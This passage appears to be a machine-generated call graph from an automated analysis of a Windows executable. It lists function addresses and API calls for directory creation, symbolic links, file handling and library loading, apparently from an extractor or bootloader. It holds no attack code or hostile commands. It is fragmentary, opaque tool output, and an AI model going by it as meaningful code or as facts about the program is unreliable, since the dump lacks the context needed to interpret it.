7ff72c65835d GetLastError 17412->17414 17412->17419 17413->17412 17415 7ff72c6526b0 48 API calls 17413->17415 17414->17419 17417 7ff72c658328 CreateDirectoryW 17415->17417 17417->17413 17419->17399 17421 7ff72c668258 17420->17421 17422 7ff72c668245 17420->17422 17669 7ff72c667ebc 17421->17669 17423 7ff72c664f08 memcpy_s 11 API calls 17422->17423 17425 7ff72c66824a 17423->17425 17427 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17425->17427 17428 7ff72c668256 17427->17428 17428->16374 17471 7ff72c671558 17430->17471 17530 7ff72c6712d0 17471->17530 17551 7ff72c6702d8 EnterCriticalSection 17530->17551 17562 7ff72c66798a 17561->17562 17564 7ff72c6679bd 17561->17564 17562->17564 17580 7ff72c670474 17562->17580 17564->17419 17566 7ff72c66a900 _isindst 17 API calls 17567 7ff72c6679ed 17566->17567 17569 7ff72c667e24 17568->17569 17570 7ff72c667e92 17568->17570 17569->17570 17572 7ff72c667e29 17569->17572 17614 7ff72c6707c0 17570->17614 17573 7ff72c667e5e 17572->17573 17574 7ff72c667e41 17572->17574 17597 7ff72c667c4c GetFullPathNameW 17573->17597 17589 7ff72c667bd8 GetFullPathNameW 17574->17589 17579 7ff72c667e56 __vcrt_freefls 17579->17405 17581 7ff72c670481 17580->17581 17583 7ff72c67048b 17580->17583 17581->17583 17587 7ff72c6704a7 17581->17587 17582 7ff72c664f08 memcpy_s 11 API calls 17584 7ff72c670493 17582->17584 17583->17582 17585 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17584->17585 17586 7ff72c6679b9 17585->17586 17586->17564 17586->17566 17587->17586 17588 7ff72c664f08 memcpy_s 11 API calls 17587->17588 17588->17584 17590 7ff72c667bfe GetLastError 17589->17590 17592 7ff72c667c14 17589->17592 17593 7ff72c664e7c _fread_nolock 11 API calls 17590->17593 17591 7ff72c667c10 17591->17579 17592->17591 17595 7ff72c664f08 memcpy_s 11 API calls 17592->17595 17594 7ff72c667c0b 17593->17594 17596 7ff72c664f08 memcpy_s 11 API calls 17594->17596 17595->17591 17596->17591 17598 7ff72c667c7f GetLastError 17597->17598 17601 7ff72c667c95 __vcrt_freefls 17597->17601 17599 7ff72c664e7c _fread_nolock 11 API calls 17598->17599 17600 7ff72c667c8c 17599->17600 17602 7ff72c664f08 memcpy_s 11 API calls 17600->17602 17603 7ff72c667c91 17601->17603 17604 7ff72c667cef GetFullPathNameW 17601->17604 17602->17603 17605 7ff72c667d24 17603->17605 17604->17598 17604->17603 17606 7ff72c667d98 memcpy_s 17605->17606 17609 7ff72c667d4d memcpy_s 17605->17609 17606->17579 17607 7ff72c667d81 17608 7ff72c664f08 memcpy_s 11 API calls 17607->17608 17610 7ff72c667d86 17608->17610 17609->17606 17609->17607 17612 7ff72c667dba 17609->17612 17612->17606 17613 7ff72c664f08 memcpy_s 11 API calls 17612->17613 17613->17610 17617 7ff72c6705d0 17614->17617 17618 7ff72c6705fb 17617->17618 17619 7ff72c670612 17617->17619 17622 7ff72c664f08 memcpy_s 11 API calls 17618->17622 17620 7ff72c670637 17619->17620 17621 7ff72c670616 17619->17621 17655 7ff72c66f5b8 17620->17655 17643 7ff72c67073c 17621->17643 17638 7ff72c670600 17622->17638 17626 7ff72c67063c 17627 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17642 7ff72c67060b __vcrt_freefls 17627->17642 17628 7ff72c67061f 17633 7ff72c65c550 _log10_special 8 API calls 17637 7ff72c670731 17633->17637 17637->17579 17638->17627 17642->17633 17644 7ff72c670786 17643->17644 17645 7ff72c670756 17643->17645 17646 7ff72c670771 17644->17646 17647 7ff72c670791 GetDriveTypeW 17644->17647 17648 7ff72c664ee8 _fread_nolock 11 API calls 17645->17648 17651 7ff72c65c550 _log10_special 8 API calls 17646->17651 17647->17646 17649 7ff72c67075b 17648->17649 17650 7ff72c664f08 memcpy_s 11 API calls 17649->17650 17652 7ff72c670766 17650->17652 17653 7ff72c67061b 17651->17653 17653->17626 17653->17628 17656 7ff72c67a4d0 memcpy_s 17655->17656 17657 7ff72c66f5ee GetCurrentDirectoryW 17656->17657 17658 7ff72c66f62c 17657->17658 17659 7ff72c66f605 17657->17659 17660 7ff72c66eb98 memcpy_s 11 API calls 17658->17660 17661 7ff72c65c550 _log10_special 8 API calls 17659->17661 17662 7ff72c66f63b 17660->17662 17663 7ff72c66f699 17661->17663 17663->17626 17676 7ff72c6702d8 EnterCriticalSection 17669->17676 17678 7ff72c65456a 17677->17678 17679 7ff72c659390 2 API calls 17678->17679 17680 7ff72c65458f 17679->17680 17681 7ff72c65c550 _log10_special 8 API calls 17680->17681 17682 7ff72c6545b7 17681->17682 17682->16407 17684 7ff72c657e2e 17683->17684 17685 7ff72c651c80 49 API calls 17684->17685 17686 7ff72c657f52 17684->17686 17692 7ff72c657eb5 17685->17692 17687 7ff72c65c550 _log10_special 8 API calls 17686->17687 17688 7ff72c657f83 17687->17688 17688->16407 17689 7ff72c651c80 49 API calls 17689->17692 17690 7ff72c654560 10 API calls 17690->17692 17691 7ff72c657f0b 17693 7ff72c659390 2 API calls 17691->17693 17692->17686 17692->17689 17692->17690 17692->17691 17694 7ff72c657f23 CreateDirectoryW 17693->17694 17694->17686 17694->17692 17696 7ff72c651637 17695->17696 17697 7ff72c651613 17695->17697 17699 7ff72c6545c0 108 API calls 17696->17699 17816 7ff72c651050 17697->17816 17701 7ff72c65164b 17699->17701 17700 7ff72c651618 17702 7ff72c65162e 17700->17702 17707 7ff72c652710 54 API calls 17700->17707 17703 7ff72c651653 17701->17703 17704 7ff72c651682 17701->17704 17702->16407 17705 7ff72c664f08 memcpy_s 11 API calls 17703->17705 17706 7ff72c6545c0 108 API calls 17704->17706 17708 7ff72c651658 17705->17708 17709 7ff72c651696 17706->17709 17707->17702 17710 7ff72c652910 54 API calls 17708->17710 17711 7ff72c65169e 17709->17711 17712 7ff72c6516b8 17709->17712 17713 7ff72c651671 17710->17713 17714 7ff72c652710 54 API calls 17711->17714 17715 7ff72c6606d4 73 API calls 17712->17715 17713->16407 17716 7ff72c6516ae 17714->17716 17717 7ff72c6516cd 17715->17717 17722 7ff72c66004c 74 API calls 17716->17722 17718 7ff72c6516f9 17717->17718 17719 7ff72c6516d1 17717->17719 17720 7ff72c651717 17718->17720 17721 7ff72c6516ff 17718->17721 17723 7ff72c664f08 memcpy_s 11 API calls 17719->17723 17728 7ff72c651739 17720->17728 17738 7ff72c651761 17720->17738 17794 7ff72c651210 17721->17794 17725 7ff72c651829 17722->17725 17726 7ff72c6516d6 17723->17726 17725->16407 17727 7ff72c652910 54 API calls 17726->17727 17734 7ff72c6516ef __vcrt_freefls 17727->17734 17730 7ff72c664f08 memcpy_s 11 API calls 17728->17730 17729 7ff72c66004c 74 API calls 17729->17716 17731 7ff72c65173e 17730->17731 17733 7ff72c652910 54 API calls 17731->17733 17732 7ff72c66039c _fread_nolock 53 API calls 17732->17738 17733->17734 17734->17729 17735 7ff72c6517da 17737 7ff72c664f08 memcpy_s 11 API calls 17735->17737 17739 7ff72c6517ca 17737->17739 17738->17732 17738->17734 17738->17735 17740 7ff72c6517c5 17738->17740 17847 7ff72c660adc 17738->17847 17742 7ff72c652910 54 API calls 17739->17742 17741 7ff72c664f08 memcpy_s 11 API calls 17740->17741 17741->17739 17742->17734 17744 7ff72c657144 17743->17744 17746 7ff72c65718b 17743->17746 17744->17746 17880 7ff72c665024 17744->17880 17746->16407 17748 7ff72c6541a1 17747->17748 17749 7ff72c6544e0 49 API calls 17748->17749 17750 7ff72c6541db 17749->17750 17751 7ff72c6544e0 49 API calls 17750->17751 17752 7ff72c6541eb 17751->17752 17753 7ff72c65423c 17752->17753 17754 7ff72c65420d 17752->17754 17756 7ff72c654110 51 API calls 17753->17756 17911 7ff72c654110 17754->17911 17757 7ff72c65423a 17756->17757 17758 7ff72c65429c 17757->17758 17759 7ff72c654267 17757->17759 17760 7ff72c654110 51 API calls 17758->17760 17918 7ff72c657cf0 17759->17918 17762 7ff72c6542c0 17760->17762 17764 7ff72c654110 51 API calls 17762->17764 17773 7ff72c654312 17762->17773 17767 7ff72c6542e9 17764->17767 17765 7ff72c654393 17768 7ff72c651950 115 API calls 17765->17768 17766 7ff72c652710 54 API calls 17770 7ff72c654297 17766->17770 17767->17773 17774 7ff72c654110 51 API calls 17767->17774 17772 7ff72c65439d 17768->17772 17769 7ff72c65c550 _log10_special 8 API calls 17771 7ff72c654435 17769->17771 17770->17769 17771->16407 17775 7ff72c6543fe 17772->17775 17776 7ff72c6543a5 17772->17776 17773->17765 17777 7ff72c65438c 17773->17777 17779 7ff72c654317 17773->17779 17781 7ff72c65437b 17773->17781 17774->17773 17778 7ff72c652710 54 API calls 17775->17778 17944 7ff72c651840 17776->17944 17777->17776 17777->17779 17778->17779 17784 7ff72c652710 54 API calls 17779->17784 17783 7ff72c652710 54 API calls 17781->17783 17783->17779 17784->17770 17785 7ff72c6543bc 17788 7ff72c652710 54 API calls 17785->17788 17786 7ff72c6543d2 17787 7ff72c651600 118 API calls 17786->17787 17789 7ff72c6543e0 17787->17789 17788->17770 17789->17770 17790 7ff72c652710 54 API calls 17789->17790 17790->17770 17792 7ff72c651c80 49 API calls 17791->17792 17793 7ff72c654474 17792->17793 17793->16407 17795 7ff72c651268 17794->17795 17796 7ff72c651297 17795->17796 17797 7ff72c65126f 17795->17797 17800 7ff72c6512b1 17796->17800 17802 7ff72c6512d4 17796->17802 17798 7ff72c652710 54 API calls 17797->17798 17799 7ff72c651282 17798->17799 17799->17734 17801 7ff72c664f08 memcpy_s 11 API calls 17800->17801 17803 7ff72c6512b6 17801->17803 17804 7ff72c6512e6 17802->17804 17814 7ff72c651309 memcpy_s 17802->17814 17805 7ff72c652910 54 API calls 17803->17805 17806 7ff72c664f08 memcpy_s 11 API calls 17804->17806 17810 7ff72c6512cf __vcrt_freefls 17805->17810 17807 7ff72c6512eb 17806->17807 17809 7ff72c652910 54 API calls 17807->17809 17808 7ff72c66039c _fread_nolock 53 API calls 17808->17814 17809->17810 17810->17734 17811 7ff72c6513cf 17812 7ff72c652710 54 API calls 17811->17812 17812->17810 17813 7ff72c660adc 76 API calls 17813->17814 17814->17808 17814->17810 17814->17811 17814->17813 17815 7ff72c660110 37 API calls 17814->17815 17815->17814 17817 7ff72c6545c0 108 API calls 17816->17817 17818 7ff72c65108c 17817->17818 17819 7ff72c6510a9 17818->17819 17820 7ff72c651094 17818->17820 17821 7ff72c6606d4 73 API calls 17819->17821 17822 7ff72c652710 54 API calls 17820->17822 17823 7ff72c6510bf 17821->17823 17828 7ff72c6510a4 __vcrt_freefls 17822->17828 17824 7ff72c6510c3 17823->17824 17825 7ff72c6510e6 17823->17825 17826 7ff72c664f08 memcpy_s 11 API calls 17824->17826 17830 7ff72c6510f7 17825->17830 17831 7ff72c651122 17825->17831 17827 7ff72c6510c8 17826->17827 17829 7ff72c652910 54 API calls 17827->17829 17828->17700 17837 7ff72c6510e1 __vcrt_freefls 17829->17837 17833 7ff72c664f08 memcpy_s 11 API calls 17830->17833 17832 7ff72c651129 17831->17832 17841 7ff72c65113c 17831->17841 17834 7ff72c651210 92 API calls 17832->17834 17835 7ff72c651100 17833->17835 17834->17837 17838 7ff72c652910 54 API calls 17835->17838 17836 7ff72c66004c 74 API calls 17839 7ff72c6511b4 17836->17839 17837->17836 17838->17837 17839->17828 17851 7ff72c6546f0 17839->17851 17840 7ff72c66039c _fread_nolock 53 API calls 17840->17841 17841->17837 17841->17840 17843 7ff72c6511ed 17841->17843 17844 7ff72c664f08 memcpy_s 11 API calls 17843->17844 17845 7ff72c6511f2 17844->17845 17846 7ff72c652910 54 API calls 17845->17846 17846->17837 17848 7ff72c660b0c 17847->17848 17865 7ff72c66082c 17848->17865 17850 7ff72c660b2a 17850->17738 17852 7ff72c654700 17851->17852 17853 7ff72c659390 2 API calls 17852->17853 17854 7ff72c65472b 17853->17854 17855 7ff72c659390 2 API calls 17854->17855 17861 7ff72c65479e 17854->17861 17856 7ff72c654746 17855->17856 17858 7ff72c65474b CreateSymbolicLinkW 17856->17858 17856->17861 17857 7ff72c65c550 _log10_special 8 API calls 17859 7ff72c6547b9 17857->17859 17860 7ff72c654775 17858->17860 17858->17861 17859->17828 17860->17861 17862 7ff72c65477e GetLastError 17860->17862 17861->17857 17862->17861 17866 7ff72c66084c 17865->17866 17867 7ff72c660879 17865->17867 17866->17867 17868 7ff72c660856 17866->17868 17869 7ff72c660881 17866->17869 17867->17850 17870 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17868->17870 17872 7ff72c66076c 17869->17872 17870->17867 17879 7ff72c66546c EnterCriticalSection 17872->17879 17881 7ff72c665031 17880->17881 17882 7ff72c66505e 17880->17882 17883 7ff72c664f08 memcpy_s 11 API calls 17881->17883 17891 7ff72c664fe8 17881->17891 17884 7ff72c665081 17882->17884 17885 7ff72c66509d 17882->17885 17886 7ff72c66503b 17883->17886 17887 7ff72c664f08 memcpy_s 11 API calls 17884->17887 17895 7ff72c664f4c 17885->17895 17889 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17886->17889 17890 7ff72c665086 17887->17890 17893 7ff72c665046 17889->17893 17892 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17890->17892 17891->17744 17894 7ff72c665091 17892->17894 17893->17744 17894->17744 17896 7ff72c664f70 17895->17896 17902 7ff72c664f6b 17895->17902 17897 7ff72c66b150 _CreateFrameInfo 45 API calls 17896->17897 17896->17902 17898 7ff72c664f8b 17897->17898 17903 7ff72c66d984 17898->17903 17902->17894 17904 7ff72c66d999 17903->17904 17905 7ff72c664fae 17903->17905 17904->17905 17906 7ff72c673304 45 API calls 17904->17906 17907 7ff72c66d9f0 17905->17907 17906->17905 17908 7ff72c66da18 17907->17908 17909 7ff72c66da05 17907->17909 17908->17902 17909->17908 17910 7ff72c672650 45 API calls 17909->17910 17910->17908 17912 7ff72c654136 17911->17912 17913 7ff72c664984 49 API calls 17912->17913 17915 7ff72c65415c 17913->17915 17914 7ff72c65416d 17914->17757 17915->17914 17916 7ff72c654560 10 API calls 17915->17916 17917 7ff72c65417f 17916->17917 17917->17757 17919 7ff72c657d05 17918->17919 17920 7ff72c6545c0 108 API calls 17919->17920 17921 7ff72c657d2b 17920->17921 17922 7ff72c657d52 17921->17922 17923 7ff72c6545c0 108 API calls 17921->17923 17925 7ff72c65c550 _log10_special 8 API calls 17922->17925 17924 7ff72c657d42 17923->17924 17926 7ff72c657d5c 17924->17926 17927 7ff72c657d4d 17924->17927 17928 7ff72c654277 17925->17928 17948 7ff72c6600e4 17926->17948 17929 7ff72c66004c 74 API calls 17927->17929 17928->17766 17928->17770 17929->17922 17931 7ff72c657dbf 17932 7ff72c66004c 74 API calls 17931->17932 17933 7ff72c657de7 17932->17933 17934 7ff72c66039c _fread_nolock 53 API calls 17942 7ff72c657d61 17934->17942 17936 7ff72c657dc6 17938 7ff72c660110 37 API calls 17936->17938 17937 7ff72c660adc 76 API calls 17937->17942 17939 7ff72c657dc1 17938->17939 17939->17931 17954 7ff72c667318 17939->17954 17940 7ff72c660110 37 API calls 17940->17942 17942->17931 17942->17934 17942->17936 17942->17937 17942->17939 17942->17940 17943 7ff72c6600e4 37 API calls 17942->17943 17943->17942 17946 7ff72c6518d5 17944->17946 17947 7ff72c651865 17944->17947 17945 7ff72c665024 45 API calls 17945->17947 17946->17785 17946->17786 17947->17945 17947->17946 17949 7ff72c6600ed 17948->17949 17950 7ff72c6600fd 17948->17950 17951 7ff72c664f08 memcpy_s 11 API calls 17949->17951 17950->17942 17952 7ff72c6600f2 17951->17952 17953 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17952->17953 17953->17950 17955 7ff72c667320 17954->17955 17956 7ff72c66733c 17955->17956 17975 7ff72c665ec8 17974->17975 17976 7ff72c665eee 17975->17976 17979 7ff72c665f21 17975->17979 17977 7ff72c664f08 memcpy_s 11 API calls 17976->17977 17978 7ff72c665ef3 17977->17978 17982 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17978->17982 17980 7ff72c665f27 17979->17980 17981 7ff72c665f34 17979->17981 17983 7ff72c664f08 memcpy_s 11 API calls 17980->17983 17993 7ff72c66ac28 17981->17993 17985 7ff72c654616 17982->17985 17983->17985 17985->16432 18006 7ff72c6702d8 EnterCriticalSection 17993->18006 18367 7ff72c6678f8 18366->18367 18370 7ff72c6673d4 18367->18370 18369 7ff72c667911 18369->16442 18371 7ff72c66741e 18370->18371 18372 7ff72c6673ef 18370->18372 18380 7ff72c66546c EnterCriticalSection 18371->18380 18373 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 18372->18373 18375 7ff72c66740f 18373->18375 18375->18369 18382 7ff72c65fe43 18381->18382 18383 7ff72c65fe71 18381->18383 18384 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 18382->18384 18385 7ff72c65fe63 18383->18385 18391 7ff72c66546c EnterCriticalSection 18383->18391 18384->18385 18385->16446 18393 7ff72c65caf2 RtlLookupFunctionEntry 18392->18393 18394 7ff72c65cb08 RtlVirtualUnwind 18393->18394 18395 7ff72c65c90b 18393->18395 18394->18393 18394->18395 18396 7ff72c65c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18395->18396 18398 7ff72c6545c0 108 API calls 18397->18398 18399 7ff72c651493 18398->18399 18400 7ff72c65149b 18399->18400 18401 7ff72c6514bc 18399->18401 18402 7ff72c652710 54 API calls 18400->18402 18403 7ff72c6606d4 73 API calls 18401->18403 18404 7ff72c6514ab 18402->18404 18405 7ff72c6514d1 18403->18405 18404->16488 18406 7ff72c6514f8 18405->18406 18407 7ff72c6514d5 18405->18407 18410 7ff72c651508 18406->18410 18411 7ff72c651532 18406->18411 18408 7ff72c664f08 memcpy_s 11 API calls 18407->18408 18409 7ff72c6514da 18408->18409 18412 7ff72c652910 54 API calls 18409->18412 18413 7ff72c664f08 memcpy_s 11 API calls 18410->18413 18414 7ff72c651538 18411->18414 18422 7ff72c65154b 18411->18422 18419 7ff72c6514f3 __vcrt_freefls 18412->18419 18415 7ff72c651510 18413->18415 18416 7ff72c651210 92 API calls 18414->18416 18417 7ff72c652910 54 API calls 18415->18417 18416->18419 18417->18419 18418 7ff72c66004c 74 API calls 18420 7ff72c6515c4 18418->18420 18419->18418 18420->16488 18421 7ff72c66039c _fread_nolock 53 API calls 18421->18422 18422->18419 18422->18421 18423 7ff72c6515d6 18422->18423 18424 7ff72c664f08 memcpy_s 11 API calls 18423->18424 18425 7ff72c6515db 18424->18425 18426 7ff72c652910 54 API calls 18425->18426 18426->18419 18428 7ff72c659390 2 API calls 18427->18428 18429 7ff72c658e94 LoadLibraryExW 18428->18429 18430 7ff72c658eb3 __vcrt_freefls 18429->18430 18430->16522 18504 7ff72c656375 18503->18504 18505 7ff72c651c80 49 API calls 18504->18505 18506 7ff72c6563b1 18505->18506 18507 7ff72c6563dd 18506->18507 18508 7ff72c6563ba 18506->18508 18510 7ff72c654630 49 API calls 18507->18510 18509 7ff72c652710 54 API calls 18508->18509 18527 7ff72c6563d3 18509->18527 18511 7ff72c6563f5 18510->18511 18512 7ff72c656413 18511->18512 18513 7ff72c652710 54 API calls 18511->18513 18514 7ff72c654560 10 API calls 18512->18514 18513->18512 18516 7ff72c65641d 18514->18516 18515 7ff72c65c550 _log10_special 8 API calls 18517 7ff72c65336e 18515->18517 18518 7ff72c65642b 18516->18518 18519 7ff72c658e80 3 API calls 18516->18519 18517->16562 18534 7ff72c656500 18517->18534 18520 7ff72c654630 49 API calls 18518->18520 18519->18518 18521 7ff72c656444 18520->18521 18522 7ff72c656469 18521->18522 18523 7ff72c656449 18521->18523 18525 7ff72c658e80 3 API calls 18522->18525 18524 7ff72c652710 54 API calls 18523->18524 18524->18527 18526 7ff72c656476 18525->18526 18528 7ff72c6564c1 18526->18528 18529 7ff72c656482 18526->18529 18527->18515 18593 7ff72c655830 GetProcAddress 18528->18593 18530 7ff72c659390 2 API calls 18529->18530 18532 7ff72c65649a GetLastError 18530->18532 18533 7ff72c652c50 51 API calls 18532->18533 18533->18527 18683 7ff72c655400 18534->18683 18536 7ff72c656526 18537 7ff72c65652e 18536->18537 18538 7ff72c65653f 18536->18538 18539 7ff72c652710 54 API calls 18537->18539 18690 7ff72c654c90 18538->18690 18545 7ff72c65653a 18539->18545 18542 7ff72c65654b 18544 7ff72c652710 54 API calls 18542->18544 18543 7ff72c65655c 18546 7ff72c65656c 18543->18546 18548 7ff72c65657d 18543->18548 18544->18545 18545->16558 18547 7ff72c652710 54 API calls 18546->18547 18547->18545 18549 7ff72c65659c 18548->18549 18550 7ff72c6565ad 18548->18550 18551 7ff72c652710 54 API calls 18549->18551 18552 7ff72c6565bc 18550->18552 18553 7ff72c6565cd 18550->18553 18551->18545 18572 7ff72c656070 18571->18572 18572->18572 18573 7ff72c656099 18572->18573 18574 7ff72c6560b0 __vcrt_freefls 18572->18574 18575 7ff72c652710 54 API calls 18573->18575 18577 7ff72c651470 116 API calls 18574->18577 18578 7ff72c652710 54 API calls 18574->18578 18579 7ff72c6561bb 18574->18579 18576 7ff72c6560a5 18575->18576 18576->16560 18577->18574 18578->18574 18579->16560 18594 7ff72c65587f GetProcAddress 18593->18594 18595 7ff72c655852 GetLastError 18593->18595 18596 7ff72c65589b GetLastError 18594->18596 18597 7ff72c6558aa GetProcAddress 18594->18597 18598 7ff72c65585f 18595->18598 18596->18598 18599 7ff72c6558d5 GetProcAddress 18597->18599 18600 7ff72c6558c6 GetLastError 18597->18600 18601 7ff72c652c50 51 API calls 18598->18601 18603 7ff72c655903 GetProcAddress 18599->18603 18604 7ff72c6558f1 GetLastError 18599->18604 18600->18598 18602 7ff72c655874 18601->18602 18602->18527 18605 7ff72c65591f GetLastError 18603->18605 18606 7ff72c655931 GetProcAddress 18603->18606 18604->18598 18605->18598 18685 7ff72c65542c 18683->18685 18684 7ff72c655434 18684->18536 18685->18684 18688 7ff72c6555d4 18685->18688 18714 7ff72c666aa4 18685->18714 18686 7ff72c655797 __vcrt_freefls 18686->18536 18687 7ff72c6547d0 47 API calls 18687->18688 18688->18686 18688->18687 18691 7ff72c654cc0 18690->18691 18692 7ff72c65c550 _log10_special 8 API calls 18691->18692 18693 7ff72c654d2a 18692->18693 18693->18542 18693->18543 18715 7ff72c666ad4 18714->18715 18718 7ff72c665fa0 18715->18718 18717 7ff72c666b04 18717->18685 18719 7ff72c665fe3 18718->18719 18720 7ff72c665fd1 18718->18720 18721 7ff72c66602d 18719->18721 18723 7ff72c665ff0 18719->18723 18722 7ff72c664f08 memcpy_s 11 API calls 18720->18722 18724 7ff72c666048 18721->18724 18727 7ff72c6647c0 45 API calls 18721->18727 18725 7ff72c665fd6 18722->18725 18726 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 18723->18726 18730 7ff72c66606a 18724->18730 18739 7ff72c666a2c 18724->18739 18729 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 18725->18729 18735 7ff72c665fe1 18726->18735 18727->18724 18729->18735 18731 7ff72c66610b 18730->18731 18733 7ff72c664f08 memcpy_s 11 API calls 18730->18733 18732 7ff72c664f08 memcpy_s 11 API calls 18731->18732 18731->18735 18734 7ff72c6661b6 18732->18734 18736 7ff72c666100 18733->18736 18737 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 18734->18737 18735->18717 18738 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 18736->18738 18737->18735 18738->18731 18740 7ff72c666a4f 18739->18740 18742 7ff72c666a66 18739->18742 18745 7ff72c66ff68 18740->18745 18744 7ff72c666a54 18742->18744 18750 7ff72c66ff98 18742->18750 18744->18724 18746 7ff72c66b150 _CreateFrameInfo 45 API calls 18745->18746 18747 7ff72c66ff71 18746->18747 18751 7ff72c664f4c 45 API calls 18750->18751 18752 7ff72c66ffd1 18751->18752 18756 7ff72c66ffdd 18752->18756 18757 7ff72c672e40 18752->18757 18791->16565 18793 7ff72c66b150 _CreateFrameInfo 45 API calls 18792->18793 18794 7ff72c66a3e1 18793->18794 18797 7ff72c66a504 18794->18797 18806 7ff72c673650 18797->18806 18832 7ff72c673608 18806->18832 18837 7ff72c6702d8 EnterCriticalSection 18832->18837 18841 7ff72c665628 18842 7ff72c66565f 18841->18842 18843 7ff72c665642 18841->18843 18842->18843 18845 7ff72c665672 CreateFileW 18842->18845 18844 7ff72c664ee8 _fread_nolock 11 API calls 18843->18844 18846 7ff72c665647 18844->18846 18847 7ff72c6656dc 18845->18847 18848 7ff72c6656a6 18845->18848 18850 7ff72c664f08 memcpy_s 11 API calls 18846->18850 18892 7ff72c665c04 18847->18892 18866 7ff72c66577c GetFileType 18848->18866 18853 7ff72c66564f 18850->18853 18859 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 18853->18859 18855 7ff72c6656bb CloseHandle 18860 7ff72c66565a 18855->18860 18856 7ff72c6656d1 CloseHandle 18856->18860 18857 7ff72c6656e5 18861 7ff72c664e7c _fread_nolock 11 API calls 18857->18861 18858 7ff72c665710 18913 7ff72c6659c4 18858->18913 18859->18860 18865 7ff72c6656ef 18861->18865 18865->18860 18867 7ff72c665887 18866->18867 18868 7ff72c6657ca 18866->18868 18870 7ff72c66588f 18867->18870 18871 7ff72c6658b1 18867->18871 18869 7ff72c6657f6 GetFileInformationByHandle 18868->18869 18873 7ff72c665b00 21 API calls 18868->18873 18874 7ff72c66581f 18869->18874 18875 7ff72c6658a2 GetLastError 18869->18875 18870->18875 18876 7ff72c665893 18870->18876 18872 7ff72c6658d4 PeekNamedPipe 18871->18872 18891 7ff72c665872 18871->18891 18872->18891 18877 7ff72c6657e4 18873->18877 18878 7ff72c6659c4 51 API calls 18874->18878 18880 7ff72c664e7c _fread_nolock 11 API calls 18875->18880 18879 7ff72c664f08 memcpy_s 11 API calls 18876->18879 18877->18869 18877->18891 18882 7ff72c66582a 18878->18882 18879->18891 18880->18891 18881 7ff72c65c550 _log10_special 8 API calls 18883 7ff72c6656b4 18881->18883 18930 7ff72c665924 18882->18930 18883->18855 18883->18856 18886 7ff72c665924 10 API calls 18887 7ff72c665849 18886->18887 18888 7ff72c665924 10 API calls 18887->18888 18889 7ff72c66585a 18888->18889 18890 7ff72c664f08 memcpy_s 11 API calls 18889->18890 18889->18891 18890->18891 18891->18881 18893 7ff72c665c3a 18892->18893 18894 7ff72c665cd2 __vcrt_freefls 18893->18894 18895 7ff72c664f08 memcpy_s 11 API calls 18893->18895 18896 7ff72c65c550 _log10_special 8 API calls 18894->18896 18897 7ff72c665c4c 18895->18897 18898 7ff72c6656e1 18896->18898 18899 7ff72c664f08 memcpy_s 11 API calls 18897->18899 18898->18857 18898->18858 18900 7ff72c665c54 18899->18900 18901 7ff72c667e08 45 API calls 18900->18901 18902 7ff72c665c69 18901->18902 18903 7ff72c665c7b 18902->18903 18904 7ff72c665c71 18902->18904 18905 7ff72c664f08 memcpy_s 11 API calls 18903->18905 18906 7ff72c664f08 memcpy_s 11 API calls 18904->18906 18907 7ff72c665c80 18905->18907 18910 7ff72c665c76 18906->18910 18907->18894 18908 7ff72c664f08 memcpy_s 11 API calls 18907->18908 18909 7ff72c665c8a 18908->18909 18911 7ff72c667e08 45 API calls 18909->18911 18910->18894 18912 7ff72c665cc4 GetDriveTypeW 18910->18912 18911->18910 18912->18894 18915 7ff72c6659ec 18913->18915 18914 7ff72c66571d 18923 7ff72c665b00 18914->18923 18915->18914 18937 7ff72c66f724 18915->18937 18917 7ff72c665a80 18917->18914 18918 7ff72c66f724 51 API calls 18917->18918 18919 7ff72c665a93 18918->18919 18919->18914 18920 7ff72c66f724 51 API calls 18919->18920 18921 7ff72c665aa6 18920->18921 18921->18914 18922 7ff72c66f724 51 API calls 18921->18922 18922->18914 18924 7ff72c665b1a 18923->18924 18925 7ff72c665b51 18924->18925 18926 7ff72c665b2a 18924->18926 18927 7ff72c66f5b8 21 API calls 18925->18927 18928 7ff72c664e7c _fread_nolock 11 API calls 18926->18928 18929 7ff72c665b3a 18926->18929 18927->18929 18928->18929 18929->18865 18931 7ff72c66594d FileTimeToSystemTime 18930->18931 18932 7ff72c665940 18930->18932 18933 7ff72c665961 SystemTimeToTzSpecificLocalTime 18931->18933 18934 7ff72c665948 18931->18934 18932->18931 18932->18934 18933->18934 18935 7ff72c65c550 _log10_special 8 API calls 18934->18935 18936 7ff72c665839 18935->18936 18936->18886 18938 7ff72c66f755 18937->18938 18939 7ff72c66f731 18937->18939 18941 7ff72c66f78f 18938->18941 18944 7ff72c66f7ae 18938->18944 18939->18938 18940 7ff72c66f736 18939->18940 18942 7ff72c664f08 memcpy_s 11 API calls 18940->18942 18943 7ff72c664f08 memcpy_s 11 API calls 18941->18943 18945 7ff72c66f73b 18942->18945 18947 7ff72c66f794 18943->18947 18948 7ff72c664f4c 45 API calls 18944->18948 18946 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 18945->18946 18949 7ff72c66f746 18946->18949 18950 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 18947->18950 18951 7ff72c66f7bb 18948->18951 18949->18917 18952 7ff72c66f79f 18950->18952 18951->18952 18953 7ff72c6704dc 51 API calls 18951->18953 18952->18917 18953->18951 20766 7ff72c6716b0 20777 7ff72c6773e4 20766->20777 20778 7ff72c6773f1 20777->20778 20779 7ff72c66a948 __free_lconv_mon 11 API calls 20778->20779 20780 7ff72c67740d 20778->20780 20779->20778 20781 7ff72c66a948 __free_lconv_mon 11 API calls 20780->20781 20782 7ff72c6716b9 20780->20782 20781->20780 20783 7ff72c6702d8 EnterCriticalSection 20782->20783 19293 7ff72c66c520 19304 7ff72c6702d8 EnterCriticalSection 19293->19304 19940 7ff72c677c20 19943 